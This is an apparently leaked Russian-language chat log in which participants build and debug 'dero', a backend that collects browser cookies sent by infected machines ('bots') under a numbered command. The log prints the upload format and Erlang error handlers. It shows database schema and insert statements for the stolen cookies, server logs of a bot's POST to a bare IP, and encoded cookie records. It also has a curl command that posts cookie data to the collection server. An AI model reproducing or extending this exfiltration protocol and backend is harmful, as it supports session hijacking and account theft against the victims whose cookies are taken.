Timestamp	From	To	Message
2021-08-27 13:16:57.476717	ttrr	flip	defender@q3mcco35auwcstmt.onion/Psi+ приглашает вас в комнату ttrr@conference.q3mcco35auwcstmt.onion
2021-08-30 14:54:14.193827	ttrr	flip	defender@q3mcco35auwcstmt.onion/Psi+ приглашает вас в комнату ttrr@conference.q3mcco35auwcstmt.onion
2021-08-30 19:16:52.565691	ttrr	flip	defender@q3mcco35auwcstmt.onion/Psi+ приглашает вас в комнату ttrr@conference.q3mcco35auwcstmt.onion
2021-08-30 19:30:48.729191	ttrr	flip	defender@q3mcco35auwcstmt.onion/Psi+ приглашает вас в комнату ttrr@conference.q3mcco35auwcstmt.onion
2021-08-31 08:20:34.375240	ttrr	flip	ну и ?
2021-08-31 08:20:44.479413	ttrr	flip	одному мне больше всез надо ?
2021-08-31 08:21:25.224989	ttrr	flip	со вчера вечера что-то писали тут?
2021-08-31 08:23:54.169383	ttrr	flip	zulas: скинь еще раз кусок того POSTа, который был отвергнут бэком
2021-08-31 08:24:17.351460	ttrr	flip	А тут истории нет?
Писал по поводу новых полей в записи куки
2021-08-31 08:24:26.072343	ttrr	flip	нету истории
2021-08-31 08:26:45.197179	ttrr	flip	ну так на чем остановились?
2021-08-31 08:27:19.304461	ttrr	flip	я остановился на этом: вот был POST, с виду нормальный, бэк на него 403 сказал. Я попросил зуласа сказать что в нем не так
2021-08-31 08:27:38.958544	ttrr	flip	а я попросил расширить лог . чтобы логировало ответ
2021-08-31 08:27:51.224234	ttrr	flip	и размер запроса
2021-08-31 08:29:36.044939	ttrr	flip	а ты steller ?
2021-08-31 08:31:18.950903	ttrr	flip	Писал по поводу новых полей в записи куки
2021-08-31 08:33:03.543475	ttrr	flip	что именно?
2021-08-31 08:33:15.477374	ttrr	flip	403 встречалась раньше ошибка
-----------CJLVIYOINTQPMYSU
Content-Disposition: form-data; name="data"

user|Chrome|.google.com|ANID|	djEw171ep2SDF+UMAcWRRWBcsbp5H34/V0frREuTTKAE2F3BXw3fVVHhgYgcKidlSSPxtTs32WPiqcV/p021G67RLpNXgRDrMqljrJ16Ml1Ckwz2a2URAQ==|1588241125|1651313125|/
user|Chrome|.register.com|__utma|	djEwnpzEp2a3+eOKByaEj0nLtLL7HGvIusWq1obAuia9wTCz3pPEUF6A+gFpZ3LHPf2GSueVelCwgrXMR96kV8MmLcClokQ=|1588241143|1651313173|/

-----------CJLVIYOINTQPMYSU
Content-Disposition: form-data; name="source"

Chrome cookies
-----------CJLVIYOINTQPMYSU--

403
Mismatch parameters count!
2021-08-31 08:33:43.141887	ttrr	flip	zulas: сколько полей в куки у тебя сейчас?
steller: а у тебя?
2021-08-31 08:34:59.535377	ttrr	flip	[ Username, Browser, Domain, Cookie_name, Cookie_value, Created, Expires, Path ]
2021-08-31 08:35:00.852431	ttrr	flip	вот поля
2021-08-31 08:35:14.269932	ttrr	flip	разделитель |
2021-08-31 08:35:28.667888	ttrr	flip	Разработчик админки планирует добавить 2 поля secure, httponly в конец записи.
Сейчас:
Username, Browser, Domain, Cookie_name, Cookie_value, Created, Expires, Path
2021-08-31 08:35:46.677770	ttrr	flip	разделители строк: [ <<10>>, <<13,10>>]
2021-08-31 08:37:31.170108	ttrr	flip	403 была, когда некоторые поля не кодировались в В64. В отстойнике они безусловно декодировались.
2021-08-31 08:38:28.755095	ttrr	flip	А что по поводу максимального размера данных, он ограничен 64КБ будет?
2021-08-31 08:39:10.943200	ttrr	flip	{read_length, 64000},
{read_timeout, 50000}
я могу и больше сделать
2021-08-31 08:39:15.180511	ttrr	flip	таковы требоания были
2021-08-31 08:40:40.544509	ttrr	flip	50000 это в миллисекундах
2021-08-31 08:43:47.771157	ttrr	flip	В модуле нет такого ограничения. Можно разбить на несколько запросов, в принципе.
А какие ошибки отстойник может отдавать? Их желательно как-то обрабатывать.
403 добавил в обработку. На модуль приходили ещё 404 и 500. 500, видимо, от прокладки.
2021-08-31 08:45:02.926038	ttrr	flip	при успешном приеме и добавлении в базу dero всегда выдает 200 и /1/ ?
2021-08-31 08:45:20.942505	ttrr	flip	403 ошибка формата данных?
2021-08-31 08:45:42.351776	ttrr	flip	просо 200 бывает без /1/ ?
2021-08-31 08:45:46.772473	ttrr	flip	просто
2021-08-31 08:46:17.068265	ttrr	flip	zulas:
2021-08-31 08:47:07.172906	ttrr	flip	зачем этот /1/ ?
2021-08-31 08:47:10.007651	ttrr	flip	reply(not_found, Req) ->
 { ok, Req1 } = cowboy_req:reply(404, [], <<"Not found">>, Req),
 Req1;

reply(forbidden, Req) ->
 { ok, Req1 } = cowboy_req:reply(403, [], <<"Forbidden">>, Req),
 Req1;

reply(missing_data, Req) ->
 { ok, Req1 } = cowboy_req:reply(403, [{<<"Forbidden">>, <<"text/plain">>}], <<"Missing data field!">>, Req),
 Req1;

reply(missing_keys, Req) ->
 { ok, Req1 } = cowboy_req:reply(403, [{<<"Forbidden">>, <<"text/plain">>}], <<"Missing keys field!">>,  Req),
 Req1;

reply(missing_parameters, Req) ->
 {ok,Req1} = cowboy_req:reply(403, [{<<"Forbidden">>, <<"text/plain">>}], <<"Mismatch parameters count!">>,  Req),
 Req1;

reply(request_timeout, Req) ->
 {ok,Req1} = cowboy_req:reply(408, [{<<"Request Timeout">>, <<"text/plain">>}], <<"Request Timeout">>,  Req),
 Req1;
2021-08-31 08:47:16.137654	ttrr	flip	вот такие ошибки бывают
2021-08-31 08:47:22.017587	ttrr	flip	текст у вас отобразился ?
2021-08-31 08:47:31.377881	ttrr	flip	а то у меня пиджин -- и нифига
2021-08-31 08:47:40.870931	ttrr	flip	отразился
2021-08-31 08:48:11.909015	ttrr	flip	200 бывает без /1/ ?
2021-08-31 08:48:50.546861	ttrr	flip	по коду вроде не бывает
2021-08-31 08:48:57.444296	ttrr	flip	почуму спрашиваю - нужно ли в модуле проверять получение /1/ или достаточно получить статус 200 ?
2021-08-31 08:49:06.641516	ttrr	flip	[11:47:07] <hof> зачем этот /1/ ?
так по тз
2021-08-31 08:49:25.814181	ttrr	flip	это типа следующая команда для клиента
2021-08-31 08:49:29.558158	ttrr	flip	т.е. 200 без /1/ не бывает?
2021-08-31 08:49:55.932986	ttrr	flip	не бывает
2021-08-31 08:50:06.570610	ttrr	flip	ок, отлично
2021-08-31 08:50:53.721951	ttrr	flip	zulas: А сейчас логирование запросов http есть, их можно проверить?
2021-08-31 08:51:29.469315	ttrr	flip	есть
2021-08-31 08:52:48.118529	ttrr	flip	Скинь тогда проблемные запросы.
2021-08-31 08:58:25.518579	ttrr	flip	2021-08-31 11:52:22.415 [info] <0.6857.3> Data: <<"POST /tot57/WIN-U4U2CDE99LP_W617601.8C95D48B33FF1976677889D52ABB8859/84/ HTTP/1.0\r\nHost: 203.76.105.227\r\nX-Real-IP: 203.76.105.227\r\nX-Forwarded-For: 203.76.105.227\r\nConnection: close\r\nContent-Length: 11059\r\nAccept: */*\r\nContent-Type: multipart/form-data; boundary=---------MOBMWAMXGTKVMATK\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)\r\nCache-Control: no-cache\r\n\r\n-----------MOBMWAMXGTKVMATK\r\nContent-Disposition: form-data; name=\"data\"\r\n\r\nAdministrador|Chrome|Lmdvb2dsZS5jb20=|Q0dJQw==|RWhReFF6RkRTRUpFWDJWelRWZzVOakZOV0RrMk1TS0hBWFJsZUhRdmFIUnRiQ3hoY0hCc2FXTmhkR2x2Ymk5NGFIUnRiQ3Q0Yld3c1lYQndiR2xqWVhScGIyNHZlRzFzTzNFOU1DNDVMR2x0WVdkbEwyRjJhV1lzYVcxaFoyVXZkMlZpY0N4cGJXRm5aUzloY0c1bkxDb3ZLanR4UFRBdU9DeGhjSEJzYVdOaGRHbHZiaTl6YVdkdVpXUXRaWGhqYUdGdVoyVTdkajFpTXp0eFBUQXVPUQ==|1625670207|1641222207|L2NvbXBsZXRlL3NlYXJjaA==\r\nAdministrador|Chrome|Lmdvb2dsZS5jb20=|Q0dJQw==|RWhReFF6RkRTRUpFWDJWelRWZzVOakZOV0RrMk1TS0hBWFJsZUhRdmFIUnRiQ3hoY0hCc2FXTmhkR2x2Ymk5NGFIUnRiQ3Q0Yld3c1lYQndiR2xqWVhScGIyNHZlRzFzTzNFOU1DNDVMR2x0WVdkbEwyRjJhV1lzYVcxaFoyVXZkMlZpY0N4cGJXRm5aUzloY0c1bkxDb3ZLanR4UFRBdU9DeGhjSEJzYVdOaGRHbHZiaTl6YVdkdVpXUXRaWGhqYUdGdVoyVTdkajFpTXp0eFBUQXVPUQ==|1625670207|1641222207|L3NlYXJjaA==\r\nAdministrador|C...">>
 State: {state,#Port<0.108426>,ranch_tcp,[cowboy_router,cowboy_handler],false,[{listener,http},{dispatch,[{'_',[],[{['...'],[],http_handler,[{limits,32768,1024,4096,102400,8529920,8388608,1024}]}]}]}],undefined,undefined,5,1,100,4096,64,4096,100,5000,1630399947415}
 ReqEmpty 0
2021-08-31 11:52:22.416 [critical] <0.6857.3>@http_handler:handle:33 Error {badmatch,false} [{base64,decode_binary,2,[{file,"base64.erl"},{line,212}]},{http_handler,'-save84/3-fun-4-',5,[{file,"src/http_handler.erl"},{line,329}]},{lists,foreach,2,[{file,"lists.erl"},{line,1338}]},{http_handler,save84,3,[{file,"src/http_handler.erl"},{line,325}]},{http_handler,handle,2,[{file,"src/http_handler.erl"},{line,30}]},{cowboy_handler,handler_handle,4,[{file,"src/cowboy_handler.erl"},{line,111}]},{cowboy_protocol,execute,4,[{file,"src/cowboy_protocol.erl"},{line,443}]}]
2021-08-31 08:58:38.141458	ttrr	flip	вот . не может басе64 декодировать
2021-08-31 08:58:42.754898	ttrr	flip	не знаю какое поле
2021-08-31 08:59:10.719440	ttrr	flip	крашей больше нет
2021-08-31 08:59:29.608341	ttrr	flip	всмысли тех что хттп2
2021-08-31 09:05:10.044879	ttrr	flip	Это старые данные. Сейчас модуль отправляет Username, Domain, Cookie_name, Cookie_value, Path  в В64
2021-08-31 09:05:45.410734	ttrr	flip	[ Group, IdLow, IdHigh, base64:decode(Username), Browser, Domain, base64:decode(Cookie_name), base64:decode(Cookie_value), Created, Expires, base64:decode(Path) ]);

вот 4 поля декодируются только
2021-08-31 09:05:49.216535	ttrr	flip	надо все ?
2021-08-31 09:07:35.429985	ttrr	flip	Нужно домен ещё декодировать
2021-08-31 09:08:11.255312	ttrr	flip	ок .. добавил в новых версиях .
2021-08-31 09:09:24.729867	ttrr	flip	<<"INSERT INTO data84 (created_at, \"group\", id_low, id_high, username, browser, \"domain\", cookie_name, cookie_value, created, expires, path ) VALUES ( now(), $1, $2, $3, $4, $5, $6, $7, $8, $9, $10, $11 )">> [<<"tot138">>,4268354464764256071,-5531770838041019469,<<149,166,247>>,<<"Firefox">>,<<".mail.ru">>,<<"mrcu">>,<<"14B45890605336B122FB29388502">>,<<"1399543312">>,<<"1714903312">>,<<"/">>]
2021-08-31 11:52:59.108 [error] <0.6879.3>@db:transform:58 Error {error,error,<<"22021">>,<<"invalid byte sequence for encoding \"UTF8\": 0x95">>,[]} with query {<<"INSERT INTO data84 (created_at, \"group\", id_low, id_high, username, browser, \"domain\", cookie_name, cookie_value, created, expires, path ) VALUES ( now(), $1, $2, $3, $4, $5, $6, $7, $8, $9, $10, $11 )">>,[<<"tot138">>,4268354464764256071,-5531770838041019469,<<149,166,247>>,<<"Firefox">>,<<".mail.ru">>,<<"mrcu">>,<<"14B45890605336B122FB29388502">>,<<"1399543312">>,<<"1714903312">>,<<"/">>]}

есть еще такое
2021-08-31 09:09:32.431422	ttrr	flip	на УТФ-8 не походит кодировка
2021-08-31 09:09:59.456849	ttrr	flip	И ещё нужно 2 поля добавить в конец записи.
secure, httponly
Значения: 0 & 1
2021-08-31 09:10:00.421429	ttrr	flip	насколько я понимаю это про <<149,166,247>>
2021-08-31 09:10:26.179184	ttrr	flip	в таблицу колонки ?
2021-08-31 09:10:55.308980	ttrr	flip	Да, в запись поле, в таблицу колонки.
2021-08-31 09:11:43.256419	ttrr	flip	А юникод в каком поле не проходит?
2021-08-31 09:20:09.637689	ttrr	flip	,<<149,166,247>> я думаю вот это не может быть юникодом
2021-08-31 09:20:45.227992	ttrr	flip	юзернейм
2021-08-31 09:22:08.346394	ttrr	flip	Похоже, пользователь. Скорее всего модуль не отправляет UTF8. Нужно проверить.
А ты можешь в readme этот формат добавить + описание ошибок?
Мы уже много времени потратили на поиск этих ошибок из-за отсутствия описания протокола обмена.
2021-08-31 09:23:06.136113	ttrr	flip	формат чего ?
2021-08-31 09:23:49.264617	ttrr	flip	в каталог doc есть некоторое описалово
2021-08-31 09:23:54.885866	ttrr	flip	Кукисов, например. Ещё бы хорошо остальные данные проверить.
2021-08-31 09:24:07.889907	ttrr	flip	Там кукисы описаны?
2021-08-31 09:24:16.336160	ttrr	flip	какие кукисы ?
2021-08-31 09:24:39.286637	ttrr	flip	Куки, печенюшки
2021-08-31 09:24:57.063840	ttrr	flip	я понял что такое куки, но к чему ты это говоришь ?
2021-08-31 09:25:05.870553	ttrr	flip	1. Создать новую команду для получения данных куки. Например, код команды 84

2. Создать таблицу для хранения данных (псевдокод SQL):
CREATE TABLE cookies (
  id SERIAL,
  username VARCHAR(255),
  browser VARCHAR(255)
  domain VARCHAR(255)
  cookie_name VARCHAR(255)
  cookie_value VARCHAR(255)
  created DATETIME,
  expires DATETIME,
  path VARCHAR(255)
);

3. Обеспечить прием данных в следующем формате:
- простой текст, разделенный на строки.
Разделитель строк - может быть как UNIX, так и DOS.
Одна строка - одна запись.
Разделитель полей в записи - вертикальная черта |
Формат записи:

username|browser|domain|cookie_name|cookie_value|created|expires|path\r\n

где

username     - имя пользователя
browser      - код броузера (enum = chrome|ff|ie|edge)
domain       - домен куки
cookie_name  - имя куки
cookie_value - значение куки
created      - дата-время создания, Unix time
expires      - дата-время истечения, Unix time
path         - путь URI
2021-08-31 09:26:49.568401	ttrr	flip	К тому, что у меня не было этого дока. Где описание В64? Это часть формата.
2021-08-31 09:28:37.291160	ttrr	flip	нету про базе64 .. сами добавили очевидно
2021-08-31 09:28:51.261199	ttrr	flip	чтобы экранировать символы
2021-08-31 09:29:50.575904	ttrr	flip	Ну, вот это и нужно в доку добавить.
created у нас в секундах?
2021-08-31 09:30:27.365266	ttrr	flip	created_at я ставлю сам как NOW()
2021-08-31 09:30:36.634016	ttrr	flip	Не догадываться же, как там отстойник обрабатывает, верно?
2021-08-31 09:31:00.363102	ttrr	flip	а .есть другой ..
2021-08-31 09:31:02.582692	ttrr	flip	щас посмотрю
2021-08-31 09:31:21.650828	ttrr	flip	А NOW() в секундах?
2021-08-31 09:32:35.412763	ttrr	flip	забей на NOW() это другое
2021-08-31 09:36:27.498482	ttrr	flip	CREATE TABLE public.data84 (
    id_low bigint NOT NULL,
    id_high bigint NOT NULL,
    "group" character varying(64),
    created_at timestamp without time zone,
    username text,
    browser text,
    domain text,
    cookie_name text,
    cookie_value text,
    created text,
    expires text,
    path text
);
2021-08-31 09:36:31.363569	ttrr	flip	вот таблица
2021-08-31 09:36:37.404650	ttrr	flip	created - просто текст
2021-08-31 09:36:41.641451	ttrr	flip	нету про базе64 .. сами добавили очевидно 
Ну, не для всех очевидно ) У нас каждый своей частью работы занимается, кто там что правит - зачастую неизвестно.
2021-08-31 09:36:43.348714	ttrr	flip	всё - просто текст
2021-08-31 09:37:34.038982	ttrr	flip	> У нас каждый своей частью работы занимается, кто там что правит - зачастую неизвестно.  
очевидно не я один это добавлял и не только на моей стороне, иначе не работало бы.
коду уже 5 лет
2021-08-31 09:39:30.946859	ttrr	flip	Ну, это тоже не очевидно)
По факту ошибки посыпались. Документация не полная.
2021-08-31 09:41:31.312572	ttrr	flip	где же ты был )
2021-08-31 10:40:22.322029	ttrr	flip	Zulas ты под новые поля базу тоже будешь менять?
Если да то просьба этого не делать, я веду миграции и хотелось бы чтобы все изменения в базе в них были отражены.
2021-08-31 10:40:58.855012	ttrr	flip	Я написал миграции под два поля secure и httponly
2021-08-31 10:41:19.042292	ttrr	flip	Оба логических.
2021-08-31 10:41:50.952937	ttrr	flip	не буду делать .
2021-08-31 10:41:53.238863	ttrr	flip	и в 90 команду добавились новые поля
2021-08-31 10:42:06.309350	ttrr	flip	ты базу на рабочем уже поменял ?я могу слить дамп ?
2021-08-31 10:42:24.071279	ttrr	flip	поля не будут сохраняться, если их больше?
2021-08-31 10:42:41.760445	ttrr	flip	dlls, programs, services Я тоже уже добавил
2021-08-31 10:42:55.648041	ttrr	flip	а, ок
2021-08-31 10:42:55.699039	ttrr	flip	Пока не накатил, сек сделаю
2021-08-31 10:44:25.981377	ttrr	flip	Там поле под ярлыки desktop нужно еще, но пока не добавил его в миграцию.
2021-08-31 10:44:38.110345	ttrr	flip	И в бэке его тоже вроде как нет
2021-08-31 10:44:40.987120	ttrr	flip	добавляй сразу всё чтобы мне не возвращаться
2021-08-31 10:46:16.071160	ttrr	flip	Пока не смогу. Ближе к вечеру время появится.
Там нужно в других частях это поле добавлять, поэтому быстро не смогу сделать.
2021-08-31 11:01:29.530718	ttrr	flip	По 2м полям в куках накатил миграции.
2021-08-31 14:33:07.579799	ttrr	flip	такой вопрос есть. Из за чего может быть такое, что я делаю запрос, бэк мне отвечает /1/ но в логах уровня info запроса нет, при этом в базе тех данных, которые я передал тоже нет. 
В бэке написано что /1/ это всегда про ответ 200, но я заметил что он отвечает /1/ и если бот есть в базе, и если его нет.
2021-08-31 14:34:45.525792	ttrr	flip	хороший вопрос, но зуласа нету в конфе уже
2021-08-31 14:34:50.757509	ttrr	flip	потому повтори этот вопрос как он появится
2021-08-31 14:35:16.318990	ttrr	flip	Оке, тут получается нет истории..
2021-08-31 14:35:52.754030	ttrr	flip	неа
2021-08-31 15:23:57.162928	ttrr	flip	для того чтобы не заходить постоянно в конфу после релогина вверху есть звездочка, нажмите 2 раза и выберите автовход - всегда
2021-08-31 15:24:14.679099	ttrr	flip	потом когда конфа будет не актуальна звездочку снимите
2021-09-01 05:41:44.671186	ttrr	flip	 > такой вопрос есть. Из за чего может быть такое, что я делаю запрос, бэк мне отвечает /1/ но в логах уровня info запроса нет, при этом в базе тех данных, которые я передал тоже нет. 
В бэке написано что /1/ это всегда про ответ 200, но я заметил что он отвечает /1/ и если бот есть в базе, и если его нет.

для начала что за запрос ? можем мы его повторить на текущей системе чтобы я его видел ?
2021-09-01 06:33:17.311658	ttrr	flip	oad
2021-09-01 13:51:45.508840	ttrr	flip	К сожалению не можем.
Если с этим серверм будет такое же история я напишу
2021-09-01 13:52:07.167823	ttrr	flip	Как повторить к сожалению не знаю пока
2021-09-02 11:28:45.763749	ttrr	flip	всем привет
2021-09-02 11:28:50.925843	ttrr	flip	как дела с деро?
2021-09-02 11:29:03.158294	ttrr	flip	zulas: понятна проблема?
2021-09-02 11:30:43.884505	ttrr	flip	деф . привет .. а в чем проблема ?
2021-09-02 11:33:13.544762	ttrr	flip	driver: отпиши что ты мне написал сюда
2021-09-02 11:33:20.364196	ttrr	flip	ответ 403 был
2021-09-02 11:33:26.027214	ttrr	flip	с ним разобрались?
2021-09-02 11:36:33.217572	ttrr	flip	Бэк отвечает 403 на попытку отправить куки.
2021-09-02 11:36:55.084933	ttrr	flip	Внесли ли изменения связанные с новыми полями?
2021-09-02 11:38:21.045624	ttrr	flip	давайте конкретно: кто и что должен внести?
2021-09-02 11:38:32.054141	ttrr	flip	тк походу зулас даже не в курсе
2021-09-02 11:39:06.180635	ttrr	flip	4ый день мы тут что то обсуждаем, а в итоге ничего не делаем
2021-09-02 11:39:10.284607	ttrr	flip	в чем проблема?
2021-09-02 11:39:34.330577	ttrr	flip	Нужно в 84 команду внести 2 поля.
secure, httponly в конец приема, получается 9 и 10 поле должно быть.
2021-09-02 11:39:51.361952	ttrr	flip	В базу должны записываться поля с такими же именами
2021-09-02 11:41:12.881705	ttrr	flip	я ничего не вносил пока ..
2021-09-02 11:41:48.450642	ttrr	flip	так уже пора внести
2021-09-02 11:41:53.196704	ttrr	flip	драйвер же просил
2021-09-02 11:42:05.655109	ttrr	flip	у нас доработка прямо сейчас в модуле сбора, требует этого
2021-09-02 11:42:10.207522	ttrr	flip	Ок. Когда?
2021-09-02 11:43:37.294831	ttrr	flip	Я не стал этого делать потому что мне сказали, что сейчас zulas занимается бэком, но я напрямую не писал задачу.
Возможно решил что вы с кодером модуля обсудили этот момент
2021-09-02 11:44:33.238098	ttrr	flip	(31.08.2021 13:44:35) zulas: добавляй сразу всё чтобы мне не возвращаться
(31.08.2021 13:46:11) driver: Пока не смогу. Ближе к вечеру время появится.
Там нужно в других частях это поле добавлять, поэтому быстро не смогу сделать.
(31.08.2021 14:01:24) driver: По 2м полям в куках накатил миграции.
2021-09-02 11:44:45.184787	ttrr	flip	ну вообще надо все сразу сделать и чтобы не возвращаться
2021-09-02 11:44:52.286027	ttrr	flip	переключение контекста -- очень тяжелая операция )
2021-09-02 11:45:14.307129	ttrr	flip	так что 
1. я жду когда в базу нужное внесется
2. когда мне будет объяснено что нужно делать
2021-09-02 11:59:16.916864	ttrr	flip	так а по-моему driver говорил что накатил миграции на базу. Это не оно?
цитату не приведу, уплыло в истории
2021-09-02 12:03:26.094441	ttrr	flip	driver: поясни мне чего ты ждешь?
2021-09-02 12:03:33.365118	ttrr	flip	что нужно от зуласа?
2021-09-02 12:11:37.701630	ttrr	flip	Дело в том что миграция по десктопу относится к другой задаче.
2021-09-02 12:11:51.017564	ttrr	flip	Сейчас нужно сделать 2 этих поля
2021-09-02 12:12:18.871825	ttrr	flip	zulas: сделаешь?
2021-09-02 12:14:06.097999	ttrr	flip	Более того к другой команде и к другой таблице.
2021-09-02 12:15:43.896252	ttrr	flip	@driver давай конкретно что тебе надо и куда ... ок ?
2021-09-02 12:17:36.624084	ttrr	flip	Нужно в 84 команду внести 2 поля.
secure, httponly в конец приема, получается 9 и 10 поле должно быть.
2021-09-02 12:18:22.059558	ttrr	flip	На запрос вида 
curl -X POST -F 'data=dXNlcg==|IE||||1240428288|1240428288|dXNlcg==|IE|demdex.net|ZGVtZGV4|NTczODQzMjMyMTAwNDg1MDEyMDI3NjIxMTIxODA0ODI1OTMyMjQ=|1240428358|1240428358|Lw==|1|1' http://(IP)/TAG/TEST_W639600.1234A242341C6D1A25B3F315D688968E/84/
Должно ответить /1/
2021-09-02 12:20:09.146624	ttrr	flip	ок .. сейчас в базе поля уже есть ?
2021-09-02 12:20:19.950690	ttrr	flip	Да
2021-09-02 12:28:19.571799	ttrr	flip	а старые клиенты еще работают ?
2021-09-02 12:28:40.295678	ttrr	flip	т.е. надо поддерживать и старый формат и новый ?
2021-09-02 12:29:44.533930	ttrr	flip	Нет, просто только новый должен начать работать.
2021-09-02 12:30:37.242905	ttrr	flip	Уже внесли нужные изменения для клиентов. Ждем именно чтобы подхватило эти изменения часть по бэку
2021-09-02 12:59:04.946169	ttrr	flip	zulas: очень прошу поторопиться, так как сейчас от тебя зависит работа многих, без правок бекенда не можем дальше двинуться
2021-09-02 13:03:56.541709	ttrr	flip	хорошо сделаю
2021-09-02 13:23:09.878741	ttrr	flip	[ Username, Browser, Domain, Cookie_name, Cookie_value, Created, Expires, Path, Secure, HttpOnly ]
2021-09-02 13:23:13.463396	ttrr	flip	такая последовательность ?
2021-09-02 13:23:20.882931	ttrr	flip	@driver
2021-09-02 13:26:57.390905	ttrr	flip	@defender как мне запушить изменения ?
2021-09-02 13:37:09.262748	ttrr	flip	Да все верно.
2021-09-02 14:18:44.637884	ttrr	flip	zulas: а я тебе вроде выдавал доступ, разве нет?
2021-09-02 16:43:17.461565	ttrr	flip	я его 100 раз забыл
2021-09-02 16:43:37.840672	ttrr	flip	~/erl/dero> git -c credential.helper=/usr/share/smartgit/lib/credentials.sh push --porcelain --progress --recurse-submodules=check origin refs/heads/master:refs/heads/master
unable to access 'https://179.43.147.243/begemot/dero.git/': gnutls_handshake() failed: Internal error
2021-09-02 16:44:19.025716	ttrr	flip	ок, щас в личку кину
2021-09-03 09:27:34.711830	ttrr	flip	Добрый день! Как успехи по пушу кода?
2021-09-03 09:28:03.406719	ttrr	flip	@zulas @defender
2021-09-03 09:28:22.266032	ttrr	flip	надо запушить . жду дефа
2021-09-03 09:31:17.969983	ttrr	flip	Ок
2021-09-03 11:49:56.201664	ttrr	flip	А есть вариант просто на сервер залить этот код пока что?
2021-09-03 11:50:22.707347	ttrr	flip	Чтобы мы потестили, а с гитом позже разобраться7
2021-09-03 11:57:50.004477	ttrr	flip	зулас запушил
2021-09-03 11:57:56.218562	ttrr	flip	я его попросил выгрузить на сервер
2021-09-03 11:58:32.837272	ttrr	flip	 driver или ты выгрузи сам
2021-09-03 12:17:17.912828	ttrr	flip	Ок
2021-09-03 12:17:26.286310	ttrr	flip	Выгружу.
2021-09-03 12:54:25.746759	ttrr	flip	SQL = "INSERT INTO data84 (created_at, \"group\", id_low, id_high, username, browser, \"domain\", cookie_name, cookie_value, created, expires, path ) VALUES ( NOW(), $1, $2, $3, $4, $5, $6, $7, $8, $9, $10, $11, $12, $13 )",
2021-09-03 12:55:03.222718	ttrr	flip	@zulas не вставил 2 поля в запрос в базу.
2021-09-03 12:55:17.838265	ttrr	flip	Поправь пожалуйста.
2021-09-03 13:02:44.310804	ttrr	flip	И таблицу архива куков, там тоже эти 2 поля нужны будут.
2021-09-03 13:03:34.029973	ttrr	flip	По остальному посмотрел, вижу схему нормальную сделал, все ок. Это у нас недавно было актуальной проблемой.
2021-09-03 13:04:19.048670	ttrr	flip	cookies_archive*
2021-09-03 13:23:45.184379	ttrr	flip	zulas отпиши по времени, когда сможешь сделать фиксы
2021-09-03 13:44:34.798653	ttrr	flip	щас посмотрю
2021-09-03 13:46:05.461942	ttrr	flip	@driver cookies_archive* .. я такой таблицей не пользуюсь
2021-09-03 13:56:14.445800	ttrr	flip	пофиксил запрос
2021-09-03 13:56:17.185701	ttrr	flip	не тестировал
2021-09-04 06:50:20.176437	ttrr	flip	сегодня отдых у всех ?
